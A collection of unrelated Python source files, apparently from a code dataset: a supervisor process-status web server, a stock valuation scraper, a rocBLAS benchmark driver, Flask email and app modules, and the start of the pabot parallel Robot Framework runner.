'<td>'+str(data['from_state'])+'</td>'
'<td>'+str(data['state'])+'</td>'
'<td class=tdr>'+str(pid)+'</td>'
'<td class=tdr>'+descriptors+'</td>'
'<td class=tdr>'+memory_usage+'</td>'
'<td class=tdr>'+cpu_usage+'</td>'
'</tr>')
finally:
html_data += ("</tbody></table>")
return html_data
# responds to http request according to the process status
class myHTTPHandler(BaseHTTPServer.BaseHTTPRequestHandler):
global HTTP_STATUS
global REFRESH_TIME
global PROCESS_STATE
# write HEAD and GET to client and then close
def do_HEAD(s):
s.send_response(HTTP_STATUS['code'])
s.send_header("Server-name", "supervisor-process-stalker 1.0")
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.close()
def do_GET(s):
try:
"""Respond to a GET request."""
s.send_response(HTTP_STATUS['code'])
s.send_header("Server-name", "supervisor-process-stalker 1.0")
s.send_header("Content-type", "text/html")
s.end_headers()
html_data = ("<html><head><title>supervisor process event handler</title>"+TABLE_STYLE+
"<meta http-equiv='refresh' content='"+str(REFRESH_TIME)+"'/></head>"
"<body><h1>Supervisor Process Event Handler</h1>"
"<div><table width='800px' id='t1'><tr><td>Status code: "+str(HTTP_STATUS['code'])+"</td></tr></table></div>"
"<p> </p>")
s.wfile.write(html_data)
html = get_process_html_info()
s.wfile.write(html)
s.wfile.write("</body></html>")
s.wfile.close()
except (IOError):
pass
# make processing silent - otherwise will mess up the event handler
def log_message(self, format, *args):
return
def HTTPServerProcess(address, port, http_status, process_state):
global HTTP_STATUS
global PROCESS_STATE
# copy the process status global variable
PROCESS_STATE = process_state
HTTP_STATUS = http_status
server = BaseHTTPServer.HTTPServer
try:
# redirect stdout to stderr so that the HTTP server won't kill the supervised STDIN/STDOUT interface
sys.stdout = sys.stderr
# Create a web server and define the handler to manage the
# incoming request
server = server((address, port), myHTTPHandler)
# Wait forever for incoming http requests
server.serve_forever()
except KeyboardInterrupt:
write_stderr('^C received, shutting down the web server')
server.socket.close()
def dict_print(d):
for proc,data in d.items():
write_stderr(str(proc))
for key,val in data.items():
write_stderr(str(key)+' is '+str(val))
# this is the default logging, only for supervised communication
def write_stdout(s):
# only eventlistener protocol messages may be sent to stdout
sys.stdout.write(s)
sys.stdout.flush()
def write_stderr(s):
global DEBUG
# this can be used for debug logging - stdout not allowed
sys.stderr.write(s)
sys.stderr.flush()
def main():
global REFRESH_TIME
global DEBUG
manager = Manager()
# stores the process status info
PROCESS_STATE = manager.dict()
#HTTP_STATUS_CODE = Value('d', True)
HTTP_STATUS = manager.dict()
HTTP_STATUS['code'] = 200
write_stderr("HTTP STATUS SET TO "+str(HTTP_STATUS['code']))
# default http meta key refresh time in seconds
REFRESH_TIME = 3
# init the default values
ADDRESS = "0.0.0.0" # bind to all interfaces
PORT = 3000 # web server listen port
DEBUG = False # no logging
parser = argparse.ArgumentParser()
parser.add_argument('--port', dest='port', help='HTTP server listen port, default 3000', required=False, type=int)
parser.add_argument('--debug', dest='debug', help='sets the debug mode for logging', required=False, action='store_true')
parser.add_argument('--address', dest='address', help='IP listen address (e.g. 172.16.0.3), default all interfaces', required=False, type=str)
parser.add_argument('--refresh', dest='refresh', help='HTTP auto refresh time in second default is 3 seconds', required=False, type=int)
args = parser.parse_args()
if args.port is not None:
PORT = args.port
if args.address is not None:
ADDRESS = args.address
if args.debug is not False:
DEBUG = True;
# Start the http server, bind to address
httpServer = Process(target=HTTPServerProcess, args=(ADDRESS, PORT, HTTP_STATUS, PROCESS_STATE))
httpServer.start()
# set the signal handler this phase
signal.signal(signal.SIGQUIT, doExit)
signal.signal(signal.SIGTERM, doExit)
signal.signal(signal.SIGINT, doExit)
signal.signal(signal.SIGCLD, doExit)
while httpServer.is_alive():
# transition from ACKNOWLEDGED to READY
write_stdout('READY\n')
# read header line and print it to stderr
line = sys.stdin.readline()
write_stderr(line)
# read event payload and print it to stderr
headers = dict([ x.split(':') for x in line.split() ])
process_state = headers['eventname']
if process_state == 'PROCESS_STATE_FATAL':
write_stderr('Status changed to FATAL')
HTTP_STATUS['code'] = 500
short_state = process_state.replace('PROCESS_STATE_', '')
length = int(headers['len'])
data = sys.stdin.read(length)
write_stderr(data)
process = dict([ x.split(':') for x in data.split() ])
pid = 0
if 'pid' in process:
pid = int(process['pid'])
now = datetime.datetime.now()
timestamp=str(now.strftime("%Y/%m/%d %H:%M:%S"))
PROCESS_STATE[process['processname']] = {'time': timestamp, 'state': short_state, 'from_state': process['from_state'],
'pid':pid}
# transition from READY to ACKNOWLEDGED
write_stdout('RESULT 2\nOK')
httpServer.join()
def kill_child_processes():
procs = psutil.Process().children()
# send SIGTERM
for p in procs:
try:
p.terminate()
except psutil.NoSuchProcess:
pass
def doExit(signalNumber, frame):
write_stderr("Got signal: "+str(signalNumber)+" need to exit ...")
kill_child_processes()
exit(0)
if __name__ == '__main__':
main()
|
stock_evaluator.py
|
import time
from yahoo_fin.stock_info import *
import json
import numpy_financial as npf
import pandas as pd
import numpy
import traceback
import csv
import random
import stopit
from concurrent.futures import ThreadPoolExecutor, as_completed
import logging
import queue
import threading
import socket
import requests
RATE_OF_RETURN = .15
MARGIN_OF_ERROR = .5
POLLING_RETRIES = 4
MAX_THREADS = 20
TIMEOUT = 20
# FIXME make this more mutable
TICKERS_CSV = './tickers.12.8.21.csv'
# TICKERS_CSV = './tickers_small.csv'
print(f'Local IP: {socket.gethostbyname(socket.gethostname())}')
ip = requests.get('https://api.ipify.org').content.decode('utf8')
print('Public IP: {}'.format(ip))
print('Getting tickers')
df = pd.read_csv(TICKERS_CSV).iloc[:,0:2]
ticker_count = len(df)
csvfile = open('outputs/good.csv', 'w')
csvwriter = csv.writer(csvfile)
columns=['ticker', 'current_EPS', 'growth_rate', 'PE', 'future_EPS', 'unadjusted_price', 'present_value', 'calculated_value', 'previous_close', 'good']
csvwriter.writerow(columns)
logging.basicConfig(level=logging.INFO, format='%(asctime)-5s :: %(relativeCreated)-4d :: %(threadName)-10s :: %(levelname)-5s: %(message)s')
filehandler = logging.FileHandler('./outputs/log.csv', mode='w')
log = logging.getLogger('stock-eval')
log.addHandler(filehandler)
log.debug('Tickers:')
log.debug(df)
@stopit.threading_timeoutable(default=('didnt finish', None, None))
def poll_api(ticker):
info = get_analysts_info(ticker)
time.sleep(random.random()*2)
try:
quote = get_quote_table(ticker)
time.sleep(random.random()*2)
except Exception:
log.error(f'{ticker}: something wrong with get_quote_table, cannot process so skipping')
log.error(traceback.format_exc())
raise Exception
return
try:
stats = get_stats_valuation(ticker)
time.sleep(random.random()*2)
except IndexError:
log.warning(f'{ticker}: cant get stats table, will try to use data from quote table')
stats = None
return info, stats, quote
def writer(q):
log.info('writer started')
csvfile = open('outputs/good.csv', 'w')
csvwriter = csv.writer(csvfile)
columns=['ticker', 'current_EPS', 'growth_rate', 'PE', 'future_EPS', 'unadjusted_price', 'present_value', 'calculated_value', 'previous_close', 'good']
csvwriter.writerow(columns)
count = 0
while 1:
m = q.get()
if m == 'kill':
kill = True
log.info('writer killed')
break
csvwriter.writerow(m)
csvfile.flush()
count += 1
if count == ticker_count:
log.info('writer done')
kill=True
if kill:
csvfile.close()
q.task_done()
def get_info(ticker, name, q):
log.info(f"Getting analysis for ticker {ticker}: {name}")
# try to get data, retry x amount of times
for i in range(POLLING_RETRIES):
try:
info, stats, quote = poll_api(ticker, timeout=TIMEOUT)
if info == 'didnt finish':
log.info(f"{i}: DIDNT FINISH LOADING IN TIME")
# ran out of retries, failed
if i == POLLING_RETRIES:
return
# retry
continue
except ValueError:
log.info(f"{ticker}: Error getting analyist info, most likely not available")
return
break
if float(info['Earnings Estimate'].iloc[0,3]) == 0:
log.info("No analysts avilable, skipping")
return
else:
log.debug(f"Num analysts: {float(info['Earnings Estimate'].iloc[0,3])}")
data = {}
# col should be "current year"
data['current_EPS'] = float(info['Earnings Estimate'].iloc[1,3])
try:
data['growth_rate'] = float(info['Growth Estimates'].loc[4, ticker].replace('%', ''))/100
except AttributeError:
log.warning("NOTE: can't find 5 year per annum growth rate, will try next year growth rate")
try:
data['growth_rate'] = float(info['Growth Estimates'].loc[3, ticker].replace('%', ''))/100
except AttributeError:
log.warning("NOTE: can't find 5 year per annum growth rate, will try next year growth rate")
data['growth_rate'] = float(info['Growth Estimates'].loc[2, ticker].replace('%', ''))/100
# TODO: add a check to make sure nothing is null and error if so
if stats is not None:
data['PE_trailing'] = float(stats.iloc[2,1])
else:
data['PE_trailing'] = numpy.nan
if numpy.isnan(data['PE_trailing']):
log.warning("NOTE: can't find PE trailing, will just use the growth percentage * 200")
data['PE_trailing'] = data['growth_rate']*200
data['future_EPS'] = data["current_EPS"]* ((1+data["growth_rate"])**10)
data['unadjusted_price'] = data["future_EPS"]* data["PE_trailing"]
data['present_value'] = npf.pv(RATE_OF_RETURN, 10, 0, -1*data['unadjusted_price'])
data['calc_value'] = data['present_value']*MARGIN_OF_ERROR
data['previous_close'] = quote['Previous Close']
good = False
if(data['previous_close'] < data['calc_value']) and data['calc_value'] > 0:
log.info("THIS IS A GOOD ONE!!!!!")
good = True
# csvwriter.writerow([ticker, data['current_EPS'], data['growth_rate'], data['PE_trailing'], data['future_EPS'], data['unadjusted_price'], data['present_value'], data['calc_value'], data['previous_close'], True])
res = [ticker, data['current_EPS'], data['growth_rate'], data['PE_trailing'], data['future_EPS'], data['unadjusted_price'], data['present_value'], data['calc_value'], data['previous_close'], good]
log.info(res)
q.put(res)
log.info("the data I used:")
log.info(json.dumps(data, indent=4))
def lambda_function(event, context):
# start the writer thread
t_start = time.time()
q = queue.Queue()
q_thread = threading.Thread(target=writer, args=(q,), daemon=True).start()
executer = ThreadPoolExecutor(max_workers=MAX_THREADS, thread_name_prefix='tkr_')
log.info(f"TICKER COUNT: {ticker_count}")
# print(f"{df.iloc[i,0]} {df.iloc[i,1]}")
futures_to_ticker = {executer.submit(get_info, df.iloc[i,0], df.iloc[i,1], q, ): df.iloc[i,0] for i in range(ticker_count)}
doneCount = 0
for future in as_completed(futures_to_ticker):
log.info(f'future {futures_to_ticker[future]} completed {doneCount + 1}/{ticker_count}')
doneCount += 1
if doneCount == ticker_count:
executer.shutdown(wait=True)
log.info('executer shutdown complete')
q.put('kill')
t_end = time.time()
log.info(f"okay, i think everything's done :) completed in {t_end-t_start}ms")
if __name__ == '__main__':
lambda_function(None, None)
|
measurePerformance.py
|
# ########################################################################
# Copyright 2016 Advanced Micro Devices, Inc.
#
# ########################################################################
import sys
import argparse
import subprocess
import itertools
import re#gex
import os
from threading import Timer, Thread
import thread, time
from platform import system
from datetime import datetime
import errorHandler
from blasPerformanceTesting import *
from performanceUtility import timeout, log
IAM = 'BLAS'
TIMOUT_VAL = 900 #In seconds
"""
define and parse parameters
"""
devicevalues = ['gpu', 'cpu']
libraryvalues = ['rocblas','acmlblas']
transvalues = ['none','transpose','conj']
sidevalues = ['left','right']
uplovalues = ['upper','lower']
diagvalues = ['unit','nonunit']
functionvalues = ['gemm', 'trmm', 'trsm', 'trsv', 'syrk', 'syr2k', 'gemv', 'symv', 'symm', 'hemm', 'herk', 'her2k' ]
precisionvalues = ['s', 'd', 'c', 'z']
roundtripvalues = ['roundtrip','noroundtrip','both']
memallocvalues = ['default','alloc_host_ptr','use_host_ptr','copy_host_ptr','use_persistent_mem_amd']
parser = argparse.ArgumentParser(description='Measure performance of the rocblas library')
parser.add_argument('--device',
dest='device', default='gpu',
help='device(s) to run on; may be a comma-delimited list. choices are ' + str(devicevalues) + '. (default gpu)')
parser.add_argument('-m', '--sizem',
dest='sizem', default=None,
help='size(s) of m to test; may include ranges and comma-delimited lists. stepping may be indicated with a colon. e.g., 1024 or 100-800:100 or 15,2048-3000')
parser.add_argument('-n', '--sizen',
dest='sizen', default=None,
help='size(s) of n to test; may include ranges and comma-delimited lists. stepping may be indicated with a colon. e.g., 1024 or 100-800:100 or 15,2048-3000')
parser.add_argument('-k', '--sizek',
dest='sizek', default=None,
help='size(s) of k to test; may include ranges and comma-delimited lists. stepping may be indicated with a colon. e.g., 1024 or 100-800:100 or 15,2048-3000')
parser.add_argument('-s', '--square',
dest='square', default=None,
help='size(s) of m=n=k to test; may include ranges and comma-delimited lists. stepping may be indicated with a colon. this option sets lda = ldb = ldc to the values indicated with --lda for all problems set with --square. e.g., 1024 or 100-800:100 or 15,2048-3000')
parser.add_argument('--problemsize',
dest='problemsize', default=None,
help='additional problems of a set size. may be used in addition to sizem/n/k and lda/b/c. each indicated problem size will be added to the list of problems to complete. should be entered in MxNxK:AxBxC format (where :AxBxC specifies lda/b/c. :AxBxC is optional. if included, lda/b/c are subject to the same range restrictions as indicated in the lda/b/c section of this help. if omitted, :0x0x0 is assumed). may enter multiple in a comma-delimited list. e.g., 2x2x2:4x6x9,3x3x3 or 1024x800x333')
parser.add_argument('--lda',
dest='lda', default=0,
help='value of lda; may include ranges and comma-delimited lists. stepping may be indicated with a colon. if transA = \'n\', lda must be >= \'m\'. otherwise, lda must be >= \'k\'. if this is violated, the problem will be skipped. if lda is 0, it will be automatically set to match either \'m\' (if transA = \'n\') or \'k\' (otherwise). may indicate relative size with +X, where X is the offset relative to M or K (depending on transA). e.g., 1024 or 100-800:100 or 15,2048-3000 or +10 (if transA = \'n\' and M = 100, lda = 110) (default 0)')
parser.add_argument('--ldb',
dest='ldb', default=0,
help='value of ldb; may include ranges and comma-delimited lists. stepping may be indicated with a colon. if transB = \'n\', ldb must be >= \'k\'. otherwise, ldb must be >= \'n\'. if this is violated, the problem will be skipped. if ldb is 0, it will be automatically set to match either \'k\' (if transB = \'n\') or \'n\' (otherwise). may indicate relative size with +X, where X is the offset relative to K or N (depending on transB). e.g., 1024 or 100-800:100 or 15,2048-3000 or +100 (if transB = \'n\' and K = 2000, ldb = 2100) (default 0)')
parser.add_argument('--ldc',
dest='ldc', default=0,
help='value of ldc; may include ranges and comma-delimited lists. stepping may be indicated with a colon. ldc must be >= \'m\'. if this is violated, the problem will be skipped. if ldc is 0, it will be automatically set to match \'m\'. may indicate relative size with +X, where X is the offset relative to M. e.g., 1024 or 100-800:100 or 15,2048-3000 or +5 (if M = 15, ldc = 20) (default 0)')
parser.add_argument('--offa',
dest='offa', default=0,
help='offset of the matrix A in memory; may include ranges and comma-delimited lists. stepping may be indicated with a colon. e.g., 0-31 or 100-128:2 or 42 (default 0)')
parser.add_argument('--offb',
dest='offb', default=0,
help='offset of the matrix B or vector X in memory; may include ranges and comma-delimited lists. stepping may be indicated with a colon. e.g., 0-31 or 100-128:2 or 42 (default 0)')
parser.add_argument('--offc',
dest='offc', default=0,
help='offset of the matrix C or vector Y in memory; may include ranges and comma-delimited lists. stepping may be indicated with a colon. e.g., 0-31 or 100-128:2 or 42 (default 0)')
parser.add_argument('-a', '--alpha',
dest='alpha', default=1.0, type=float,
help='specifies the scalar alpha')
parser.add_argument('-b', '--beta',
dest='beta', default=1.0, type=float,
help='specifies the scalar beta')
parser.add_argument('-f', '--function',
dest='function', default='gemm',
help='indicates the function(s) to use. may be a comma delimited list. choices are ' + str(functionvalues) + ' (default gemm)')
parser.add_argument('-r', '--precision',
dest='precision', default='s',
help='specifies the precision for the function. may be a comma delimited list. choices are ' + str(precisionvalues) + ' (default s)')
parser.add_argument('--transa',
dest='transa', default='none',
help='select none, transpose, or conjugate transpose for matrix A. may be a comma delimited list. choices are ' + str(transvalues) + ' (default none)')
parser.add_argument('--transb',
dest='transb', default='none',
help='select none, transpose, or conjugate transpose for matrix B. may be a comma delimited list. choices are ' + str(transvalues) + ' (default none)')
parser.add_argument('--side',
dest='side', default='left',
help='select side, left or right for TRMM and TRSM. may be a comma delimited list. choices are ' + str(sidevalues) + ' (default left)')
parser.add_argument('--uplo',
dest='uplo', default='upper',
help='select uplo, upper or lower triangle. may be a comma delimited list. choices are ' + str(uplovalues) + ' (default upper)')
parser.add_argument('--diag',
dest='diag', default='unit',
help='select diag, whether set diagonal elements to one. may be a comma delimited list. choices are ' + str(diagvalues) + ' (default unit)')
parser.add_argument('--library',
dest='library', default='rocblas',
help='indicates the library to use. choices are ' + str(libraryvalues) + ' (default rocblas)')
parser.add_argument('--label',
dest='label', default=None,
help='a label to be associated with all transforms performed in this run. if LABEL includes any spaces, it must be in \"double quotes\". note that the label is not saved to an .ini file. e.g., --label cayman may indicate that a test was performed on a cayman card or --label \"Windows 32\" may indicate that the test was performed on Windows 32')
parser.add_argument('--tablefile',
dest='tableOutputFilename', default=None,
help='save the results to a plaintext table with the file name indicated. this can be used with rocblas.plotPerformance.py to generate graphs of the data (default: table prints to screen)')
parser.add_argument('--roundtrip',
dest='roundtrip', default='noroundtrip',
help='whether measure the roundtrips or not. choices are ' + str(roundtripvalues) + '. (default noroundtrip); should not be specified when calling ACML')
parser.add_argument('--memalloc',
dest='memalloc', default='default',
help='set the flags for OpenCL memory allocation. Choices are ' + str(memallocvalues) + '. (default is default); do not need to set when calling ACML or if roundtrip is not set')
ini_group = parser.add_mutually_exclusive_group()
ini_group.add_argument('--createini',
dest='createIniFilename', default=None, type=argparse.FileType('w'),
help='create an .ini file with the given name that saves the other parameters given at the command line, then quit. e.g., \'rocblas.measurePerformance.py -m 10 -n 100 -k 1000-1010 -f sgemm --createini my_favorite_setup.ini\' will create an .ini file that will save the configuration for an sgemm of the indicated sizes.')
ini_group.add_argument('--ini',
dest='useIniFilename', default=None, type=argparse.FileType('r'),
help='use the parameters in the named .ini file instead of the command line parameters.')
args = parser.parse_args()
label = str(args.label)
roundtrip = str(args.roundtrip)
library = str(args.library)
memalloc = str(args.memalloc)
subprocess.call('mkdir perfLog', shell = True)
logfile = os.path.join('perfLog', (label+'-'+'blasMeasurePerfLog.txt'))
def printLog(txt):
print txt
log(logfile, txt)
printLog("=========================MEASURE PERFORMANCE START===========================")
printLog("Process id of Measure Performance:"+str(os.getpid()))
#This function is defunct now
@timeout(5, "fileName") # timeout is 15 minutes, 15*60 = 300 secs
def checkTimeOutPut2(args):
global currCommandProcess
#ret = subprocess.check_output(args, stderr=subprocess.STDOUT)
#return ret
currCommandProcess = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
printLog("Curr Command Process id = "+str(currCommandProcess.pid))
ret = currCommandProcess.communicate()
if(ret[0] == None or ret[0] == ''):
errCode = currCommandProcess.poll()
raise subprocess.CalledProcessError(errCode, args, output=ret[1])
return ret[0]
#Spawns a separate thread to execute the library command and wait for that thread to complete
#This wait is of 900 seconds (15 minutes). If still the thread is alive then we kill the thread
def checkTimeOutPut(args):
t = None
global currCommandProcess
global stde
global stdo
stde = None
stdo = None
def executeCommand():
global currCommandProcess
global stdo
global stde
try:
stdo, stde = currCommandProcess.communicate()
printLog('stdout:\n'+str(stdo))
printLog('stderr:\n'+str(stde))
except:
printLog("ERROR: UNKNOWN Exception - +checkWinTimeOutPut()::executeCommand()")
currCommandProcess = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
thread = Thread(target=executeCommand)
thread.start()
thread.join(TIMOUT_VAL) #wait for the thread to complete
if thread.is_alive():
printLog('ERROR: Killing the process - terminating thread because it is taking too much of time to execute')
currCommandProcess.kill()
printLog('ERROR: Timed out exception')
raise errorHandler.ApplicationException(__file__, errorHandler.TIME_OUT)
if stdo == "" or stdo==None:
errCode = currCommandProcess.poll()
printLog('ERROR: @@@@@Raising Called processor exception')
raise subprocess.CalledProcessError(errCode, args, output=stde)
return stdo
printLog('Executing measure performance for label: '+str(label))
create_ini_file_if_requested(args)
args = load_ini_file_if_requested(args, parser)
args = split_up_comma_delimited_lists(args)
"""
check parameters for sanity
"""
if args.sizem.count(None) == 0 and (args.sizen.count(None) or args.sizek.count(None)):
printLog( 'ERROR: if any of m, n, or k are specified, all of m, n, and k must be specified')
quit()
if args.sizen.count(None) == 0 and (args.sizem.count(None) or args.sizek.count(None)):
printLog( 'ERROR: if any of m, n, or k are specified, all of m, n, and k must be specified')
quit()
if args.sizek.count(None) == 0 and (args.sizem.count(None) or args.sizen.count(None)):
printLog( 'ERROR: if any of m, n, or k are specified, all of m, n, and k must be specified')
quit()
if args.square.count(None) and args.problemsize.count(None) and args.sizem.count(None) and args.sizen.count(None) and args.sizek.count(None):
printLog( 'ERROR: at least one of [--square] or [--problemsize] or [-m, -n, and -k] must be specified')
quit()
args.sizem = expand_range(args.sizem)
args.sizen = expand_range(args.sizen)
args.sizek = expand_range(args.sizek)
args.square = expand_range(args.square)
args.lda = expand_range(args.lda)
args.ldb = expand_range(args.ldb)
args.ldc = expand_range(args.ldc)
args.offa = expand_range(args.offa)
args.offb = expand_range(args.offb)
args.offc = expand_range(args.offc)
args.problemsize = decode_parameter_problemsize(args.problemsize)
"""
create the problem size combinations for each run of the client
"""
if not args.sizem.count(None):
# we only need to do make combinations of problem sizes if m,n,k have been specified explicitly
problem_size_combinations = itertools.product(args.sizem, args.sizen, args.sizek,
args.lda, args.ldb, args.ldc)
problem_size_combinations = list(itertools.islice(problem_size_combinations, None))
else:
problem_size_combinations = []
"""
add manually entered problem sizes to the list of problems to crank out
"""
manual_test_combinations = []
if not args.problemsize.count(None):
for n in args.problemsize:
sizem = []
sizen = []
sizek = []
lda = []
ldb = []
ldc = []
sizem.append(int(n[0][0]))
sizen.append(int(n[0][1]))
sizek.append(int(n[0][2]))
if len(n) > 1:
lda.append(int(n[1][0]))
ldb.append(int(n[1][1]))
ldc.append(int(n[1][2]))
else:
lda.append(0)
ldb.append(0)
ldc.append(0)
combos = itertools.product(sizem,sizen,sizek,lda,ldb,ldc)
combos = list(itertools.islice(combos, None))
for n in combos:
manual_test_combinations.append(n)
"""
add square problem sizes to the list of problems to crank out
"""
square_test_combinations = []
if not args.square.count(None):
for n in args.square:
combos = itertools.product([n],[n],[n],args.lda) # only lda is considered with --square, and lda/b/c are all set to the values specified by lda
combos = list(itertools.islice(combos, None))
for n in combos:
square_test_combinations.append((n[0],n[1],n[2],n[3],n[3],n[3])) # set lda/b/c = lda
problem_size_combinations = problem_size_combinations + manual_test_combinations + square_test_combinations
"""
create final list of all transformations (with problem sizes and transform properties)
"""
test_combinations = itertools.product(problem_size_combinations, args.offa, args.offb, args.offc, args.alpha, args.beta, args.transa, args.transb, args.side, args.uplo, args.diag, args.function, args.precision, args.device, args.library)
test_combinations = list(itertools.islice(test_combinations, None))
test_combinations = [BlasTestCombination(params[0][0], params[0][1], params[0][2], params[0][3], params[0][4], params[0][5], params[1], params[2], params[3], params[4], params[5], params[6], params[7], params[8], params[9], params[10], params[11], params[12], params[13], params[14], label) for params in test_combinations]
"""
open output file and write the header
"""
table = open_file(args.tableOutputFilename)
table.write(blas_table_header() + '\n')
table.flush()
"""
turn each test combination into a command, run the command, and then stash the gflops
"""
result = [] # this is where we'll store the results for the table
printLog( 'Total combinations = '+str(len(test_combinations)))
vi = 0
#test_combinations = test_combinations[:5]
for params in test_combinations:
vi = vi+1
printLog('preparing command: '+ str(vi))
device = params.device
sizem = params.sizem
sizen = params.sizen
sizek = params.sizek
lda = params.lda
ldb = params.ldb
ldc = params.ldc
offa = params.offa
offb = params.offb
offc = params.offc
alpha = params.alpha
beta = params.beta
function = params.function
precision = params.precision
library = params.library
label = params.label
if params.side == 'left':
side = 'L'
elif params.side == 'right':
side = 'R'
else:
printLog( 'ERROR: unknown value for side')
quit()
if params.uplo == 'upper':
uplo = 'U'
elif params.uplo == 'lower':
uplo = 'L'
else:
printLog( 'ERROR: unknown value for uplo')
quit()
if params.diag == 'unit':
diag = 'U'
elif params.diag == 'nonunit':
diag = 'N'
else:
printLog( 'ERROR: unknown value for diag')
quit()
if re.search('^\+\d+$', lda):
if params.transa == 'none':
lda = str(int(lda.lstrip('+')) + int(sizem))
else:
lda = str(int(lda.lstrip('+')) + int(sizek))
if re.search('^\+\d+$', ldb):
if params.transb == 'none':
ldb = str(int(ldb.lstrip('+')) + int(sizek))
else:
ldb = str(int(ldb.lstrip('+')) + int(sizen))
if re.search('^\+\d+$', ldc):
ldc = str(int(ldc.lstrip('+')) + int(sizem))
if params.transa == 'none':
transa = 'N'
elif params.transa == 'transpose':
transa = 'T'
elif params.transa == 'conj':
transa = 'C'
else:
printLog( 'ERROR: unknown value for transa')
if params.transb == 'none':
transb = 'N'
elif params.transb == 'transpose':
transb = 'T'
elif params.transb == 'conj':
transb = 'C'
else:
printLog( 'ERROR: unknown value for transb')
if library == 'acmlblas':
arguments = [executable(library),
'-m', sizem,
'-n', sizen,
'-k', sizek,
'--lda', lda,
'--ldb', ldb,
'--ldc', ldc,
'--alpha', alpha,
'--beta', beta,
'--transposeA', transa,
'--transposeB', transb,
'--side', side,
'--uplo', uplo,
'--diag', diag,
'--function', function,
'--precision', precision,
'-p', '10',
'--roundtrip', roundtrip]
elif library == 'rocblas':
arguments = [executable(library),
'-m', sizem,
'-n', sizen,
'-k', sizek,
'--lda', lda,
'--ldb', ldb,
'--ldc', ldc,
'--alpha', alpha,
'--beta', beta,
'--transposeA', transa,
'--transposeB', transb,
'--side', side,
'--uplo', uplo,
'--diag', diag,
'--function', function,
'--precision', precision]
else:
printLog( 'ERROR: unknown library:"' +library+ '" can\'t assemble command')
quit()
writeline = True
try:
printLog('Executing Command: '+str(arguments))
output = checkTimeOutPut(arguments);
output = output.split(os.linesep);
printLog('Execution Successfull---------------\n')
except errorHandler.ApplicationException as ae:
writeline = False
#Killing the process
#if system() != 'Windows':
# currCommandProcess.kill()
# printLog('ERROR: Killed process')
printLog('ERROR: Command is taking too much of time-- '+ae.message+'\n'+'Command: \n'+str(arguments))
except subprocess.CalledProcessError as clientCrash:
if clientCrash.output.count('bad_alloc'):
writeline = False
printLog( 'Omitting line from table - problem is too large')
elif clientCrash.output.count('CL_INVALID_BUFFER_SIZE'):
writeline = False
printLog( 'Omitting line from table - problem is too large')
elif clientCrash.output.count('CL_INVALID_WORK_GROUP_SIZE'):
writeline = False
printLog( 'Omitting line from table - workgroup size is invalid')
elif clientCrash.output.count('lda must be set to 0 or a value >='):
writeline = False
printLog( 'Omitting line from table - lda is too small')
elif clientCrash.output.count('ldb must be set to 0 or a value >='):
writeline = False
printLog( 'Omitting line from table - ldb is too small')
elif clientCrash.output.count('ldc must be set to 0 or a value >='):
writeline = False
printLog( 'Omitting line from table - ldc is too small')
else:
writeline = False
printLog('ERROR: client crash.\n')
printLog(str(clientCrash.output))
printLog( str(clientCrash))
printLog('In original code we quit here - 1')
continue
#quit()
if writeline:
gflopsoutput = itertools.ifilter( lambda x: x.count('Gflops'), output)
gflopsoutput = list(itertools.islice(gflopsoutput, None))
thisResult = re.search('\d+\.*\d*e*-*\d*$', gflopsoutput[0])
if thisResult != None:
thisResult = float(thisResult.group(0))
thisResult = (params.sizem,
params.sizen,
params.sizek,
params.lda,
params.ldb,
params.ldc,
params.offa,
params.offb,
params.offc,
params.alpha,
params.beta,
params.transa,
params.transb,
params.side,
params.uplo,
params.diag,
params.precision + params.function,
params.device,
params.library,
params.label,
thisResult)
outputRow = ''
for x in thisResult:
outputRow = outputRow + str(x) + ','
outputRow = outputRow.rstrip(',')
table.write(outputRow + '\n')
table.flush()
else:
if gflopsoutput[0].find('nan') or gflopsoutput[0].find('inf'):
printLog( 'WARNING: output from client was funky for this run. skipping table row')
else:
prinLog( 'ERROR: output from client makes no sense')
prinLog(str( gflopsoutput[0]))
printLog('In original code we quit here - 2')
continue
#quit()
printLog("=========================MEASURE PERFORMANCE ENDS===========================\n")
|
email.py
|
# -*- coding: utf-8 -*-
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from .extensions import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
|
app.py
|
from flask import Flask, request, jsonify
import logging
import sys
import threading
from web import util
from web.api import timeseries
try:
assert False
sys.exit('ERROR asserts disabled, exiting')
except AssertionError:
pass
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
app = Flask(__name__)
# Register endpoints
app.register_blueprint(timeseries.bp)
UPLOAD_FOLDER = '/grid_data'
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
threading.Thread(target=lambda: util.every(5, util.remove_download_files, app)).start()
@app.route("/public/hc")
def public_hc():
return "OK", 200
@app.errorhandler(AssertionError)
def handle_assertion(error):
ret = {'code': 400, 'error': error.args[0]}
app.logger.warn('ERR {code} {error}'.format(**ret),
extra={'event': 'error', 'error': ret['error']})
print('ERR {code} {error}'.format(**ret))
return jsonify(**ret), ret['code']
@app.after_request
def log_request(response):
if not request.path == '/public/hc':
ret = {'status': response.status_code, 'request_method': request.method, 'request_uri': request.url}
app.logger.info("{status} {request_method} {request_uri}".format(**ret), extra=ret)
print("{status} {request_method} {request_uri}".format(**ret))
return response
|
pabot.py
|
#!/usr/bin/env python
# Copyright 2014->future! Mikko Korpela
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# partly based on work by Nokia Solutions and Networks Oyj
"""A parallel executor for Robot Framework test cases.
Version 1.10.0
Supports all Robot Framework command line options and also following
options (these must be before normal RF options):
--verbose
more output
--command [ACTUAL COMMANDS TO START ROBOT EXECUTOR] --end-command
RF script for situations where pybot is not used directly
--processes [NUMBER OF PROCESSES]
